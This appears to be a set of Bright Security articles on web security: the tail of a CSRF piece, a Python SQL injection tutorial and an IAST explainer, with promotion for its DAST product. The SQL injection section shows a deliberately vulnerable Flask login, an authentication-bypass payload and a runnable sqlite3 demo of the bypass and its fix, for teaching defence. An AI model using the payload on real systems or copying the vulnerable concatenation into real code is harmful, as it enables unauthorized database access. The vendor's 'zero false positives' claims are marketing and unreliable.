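# The string a server would emit in its Set-Cookie response header:
print(cookie["session"].OutputString())
```

With SameSite=Lax (the default in modern browsers), the browser omits the session cookie from cross-site POST requests, so a forged form submission arrives unauthenticated.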

Conduct Regular Web Application Security Tests to Identify CSRF

Even if CSRF vulnerabilities in web applications are successfully addressed, application updates and code changes may expose your application to CSRF in the future. Dynamic Application Security Testing (DAST) helps you continuously scan and test for potential security weaknesses in web applications, including CSRF vulnerabilities.

Bright Security is a next-generation DAST solution that helps automate the detection and remediation of many vulnerabilities, including CSRF, early in the development process.

By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. 

SQL Injection Python: Attack Example and 4 Tips for Prevention

What is SQL Injection?

SQL injection (SQLi) involves adding malicious code to a database query to gain unauthorized access to a web application’s database. Threat actors employ SQL injection techniques to manipulate SQL code, intending to execute malicious code that can help them gain access to sensitive data or compromise the database server. 

A successful SQL injection attack can potentially expose any data stored by the database, including intellectual property, administrative credentials, and customer data. Threat actors can use SQL injection to target any SQL database, such as MySQL, SQL Server, and Oracle. Typically, SQL injection attacks target web applications using a database on the back end.

SQL injection is a common security exploit. Threat actors employ this technique frequently, using automated tools to increase the number of attacks they can launch and their scope. SQL injection falls under the injection category, ranked #3 in the OWASP Top 10 list of web application security risks. 


How Do SQL Injection Attacks Work?

Threat actors launch SQL injection attacks by first identifying vulnerable user inputs in a web application or page that employs user input directly within an SQL query. This vulnerability allows actors to craft and send input content (a malicious payload) that executes malicious SQL commands in the database.

Web applications and sites typically store all data in SQL databases. SQL is a query language that manages the data stored in a relational database. SQL commands perform actions on data, allowing access, deletion, and modification, and in some configurations can also run operating system commands. As a result, successful SQL injection attacks can have critical consequences.

Threat actors launch SQL injection attacks to gain unauthorized access to data and then steal it, modify it, delete it, or perform malicious actions on the breached database. For example, SQL injection can grant access to user credentials, allowing actors to impersonate database users. If the user is a database administrator, the actor gains access to all database privileges.

SQL enables authorized users to select and retrieve data from the database. SQL injection vulnerabilities can allow threat actors to gain unauthorized access to all data on the database server. Threat actors can use the privileges obtained through SQL injection to modify data, add new records, delete records, and drop tables.

Example of SQL Injection in Python

The following example shows a SQL injection vulnerability in a Flask application. It is based on code provided by SecureFlag.

The application defines a route for the URL /login and requests credentials from the user:

@app.route("/login")
def login():
    username = request.values.get('username')
    password = request.values.get('password')

Next, the application connects to a database running on the localhost:

    db = pymysql.connect("localhost")
    cursor = db.cursor()

This part of the application is vulnerable to SQL injection. The app runs a SQL query in which it insecurely concatenates the username and password fields:

    cursor.execute("SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, password))

If the query returns a matching record, the application logs the user in:

    record = cursor.fetchone()

    if record:
        session['logged_user'] = username

    db.close()

Because the application accepts user inputs and processes them with no validation as part of the SQL query, it is possible for the attacker to switch context and override the authentication mechanism. 

For example, the attacker could inject the following string into the username field:

john' OR 'a'='a';-- 

The following query is then submitted to the database:

SELECT * FROM users WHERE username = 'john' OR 'a'='a';-- AND password = '';

Because the 'a'='a' statement is always true, the expression allows the attacker to log in as the user john, if that account exists, or as the first entry in the users table. The characters ;-- comment out the rest of the SQL query, causing the application to ignore the password field.
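The bypass and its standard fix can be demonstrated end to end with the standard library's sqlite3 module (substituted here for the article's MySQL setup; the payload is a variant without the trailing comment, since sqlite3 executes only a single statement, and the table contents are invented for illustration):

```python
import sqlite3

# In-memory database with one user, mirroring the vulnerable Flask example.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('john', 's3cret')")

payload = "john' OR 'a'='a"

# Vulnerable: the payload is spliced into the SQL text itself,
# exactly like the cursor.execute(... % ...) call above.
row = db.execute(
    "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
    % (payload, "")
).fetchone()
print(row)  # ('john', 's3cret') -- login bypassed with no password

# Fixed: placeholders send the payload as data, never as SQL.
row = db.execute(
    "SELECT * FROM users WHERE username = ? AND password = ?",
    (payload, ""),
).fetchone()
print(row)  # None -- no matching user, authentication fails
```

The same fix applies to the Flask example: pass `(username, password)` as the second argument to `cursor.execute()` instead of interpolating them into the query string.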

See examples of real-life attacks in our guide to SQL injection attacks

4 Tips for Preventing SQL Injection in Python

The most important way to prevent SQL injection is to avoid vulnerable code and insecure coding practices. Here are a few ways to do that—they will be effective against SQL injection and many other vulnerabilities that can affect your Python code.

1. Avoid Insecure Packages

When you import a module into a Python application, the interpreter runs its code. This means you should be careful about which modules you import. 

The PyPI package index is a great resource, but there is no verification that all the code in the libraries listed there is secure. Many malicious packages exist on PyPI; some attempt to trick users by adopting the names of well-known libraries with small misspellings (typosquatting). 

If you are unsure of the authenticity or contents of a package, investigate further; if you are still unsure about its origin or security status, don't use it.

2. Identifying Vulnerabilities

The first step in preventing vulnerabilities is to create a checklist of security best practices and review it before releasing your code or promoting it to a test environment. You should adhere to these best practices at the development stage, and automatically verify them at the testing stage. Ideally, you should adopt automated tools that scan your code at all stages of the software development lifecycle (SDLC).

3. Use Linters and Static Analysis Tools

Linters are tools that provide automated recommendations about good coding practices. They are a simple form of static application security testing (SAST) tools, which analyze source code during the development phase of a project. Linters can be used manually in the editor, as part of a local development process, or as part of an automated testing process. 

There are several linters in Python, including:

  • Pylint—Python’s de facto linter, which flags bad code practices, some of which can lead to vulnerabilities. However, it does not provide extensive security recommendations.
  • Bandit—you can use this tool to discover common security issues in Python code. Bandit processes each file, builds an AST from it, and runs the appropriate plugins against the AST nodes.
  • IDE integrations—Python IDEs like PyCharm and Wing have these and other tools built in, and plugins for text editors can provide similar security guidance.

Related content: Read our guide to SAST

4. Use Dynamic Application Security Testing

Dynamic application security testing (DAST) is an application security technique that helps developers discover vulnerabilities in web applications while they run in staging or production environments.

DAST testing can find a wide range of vulnerabilities, including I/O validation issues that can make applications vulnerable to SQL injection attacks. The major benefit of DAST testing is that it can validate that a vulnerability is really exploitable—meaning that attackers can actually perform a successful SQL injection attack. DAST testing can also help identify misconfigurations and errors that could lead to a SQL injection attack.

DAST Testing for Python Applications with Bright Security 

Bright Security helps automate the detection and remediation of many vulnerabilities including SQLi, early in the development process, across web applications and APIs. 

By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. 

Scan any web app, or REST, SOAP and GraphQL APIs to prevent SQL injection vulnerabilities – try Bright Security free.

IAST

What is Interactive Application Security Testing (IAST)?

Interactive application security testing (IAST) solutions help detect and remediate vulnerabilities in web applications, as part of an organization’s security testing toolset.

IAST involves using dynamic testing, also known as runtime testing, to monitor application performance. IAST solutions instrument applications during runtime, using specialized sensors, to collect operational data and analyze user interactions with the application. 

The IAST process can incorporate a combination of automated security tests, customized tests defined by the organization, or software composition analysis (SCA) to analyze open source components and find known vulnerabilities.


How Do IAST Tools Work?

IAST tools deploy agents and sensors in the application during the post-build phase of the software development cycle. The agent works by observing the application’s performance and analyzing traffic flow. It maps external signatures or source code patterns to identify complex security vulnerabilities. 

IAST tools provide a dashboard or web-based interface that lets you view testing reports in real time and generate customized reports that suit your CI/CD pipeline. You can also export IAST results to issue tracking tools.

IAST vs SAST vs DAST

Static application security testing (SAST) is a white box method that checks your code for vulnerabilities and flaws. It involves scanning code at rest, searching for known flaws against an established set of rules. During the scan, a human or an automated program examines the static code instruction by instruction and line by line. 

Dynamic application security testing (DAST) is a black box method that checks running applications for security vulnerabilities and weaknesses. It involves looking for ways to attack the application without getting authorized access to the source code. A pentester or tool performing DAST simulates an external attack, typically by injecting or feeding malicious or faulty data to the tested software.

Related content: Read our guide to DAST vs SAST

IAST employs both DAST and SAST techniques to test the inner workings of the source code, usually while the application is in development. IAST does not simulate an external attack and does not scan the entire codebase. Instead, IAST checks functionality at specific predefined points to achieve faster testing times. As a result, IAST does not provide complete coverage.

IAST Benefits and Drawbacks

Here are notable benefits of IAST:

  • Scans code in production—SAST tools often produce numerous false positives, for example, reporting a line of code that was already addressed in another area of the codebase. IAST scans code in production while focusing only on issues that truly matter.
  • Scans code in development—IAST can help shift security checks to the left by checking specific issues during development. For example, IAST tools with IDE integration can offer quick feedback on features in development. 
  • Quick remediation—IAST helps link issues with specific code locations. It enables developers to quickly click through an application to find specific problems and gain insights into quick remediation recommendations. 

Here are notable drawbacks of IAST:

  • Programming-language dependent—IAST tools are often bound to specific technologies that may not fit your scenario. Additionally, some tools may require changing your code to include the vendor’s sensor modules.  
  • Time intensive—IAST requires building and executing the tested application, which takes more time overall. If you use IDE plugins, you can leverage the quick feedback to catch issues during development. However, it can take longer when building big test suites that run on all production releases.
  • Does not provide complete code coverage—IAST scans only executed code to help reduce the number of false positives. It means the test does not cover all the code, including any code that was accidentally released without going through a quality assurance check.

Related content: Read our guide to shift left testing.

How to Choose IAST Software

Evaluate the following criteria when selecting an IAST solution:

  • Regulations and standards—IAST solutions must be able to scan for vulnerabilities and produce reports in line with the standards and regulations your organization complies with, such as GDPR, HIPAA, PCI DSS, and SOC 2.
  • Low false positives—an IAST solution should reduce the time needed to find and eliminate false positives. It should do so without requiring reconfiguration of the tool, custom services, or ongoing tuning.
  • Automated vulnerabilities identification—an IAST solution should accurately detect known vulnerabilities while your team performs functional tests. High severity bugs should create a ticket in your bug tracking system or break the build, while sending alerts to your developers.
  • Microservices support—microservices are a mainstream method for application development, and they introduce additional attack vectors. An IAST solution should allow you to assess multiple microservices from a single interface. Learn more in our guide to microservices security.
  • Easy deployment into DevOps and agile workflows—IAST tools must integrate into the existing DevOps pipeline and work seamlessly with standard build and testing tools.

  • Sensitive data tracking—IAST should help protect personally identifiable information (PII) and company IP. You should be able to automatically track sensitive information in your applications.

Do you want to try a false-positive free DAST tool instead? Sign up for a FREE Bright account and start testing in minutes.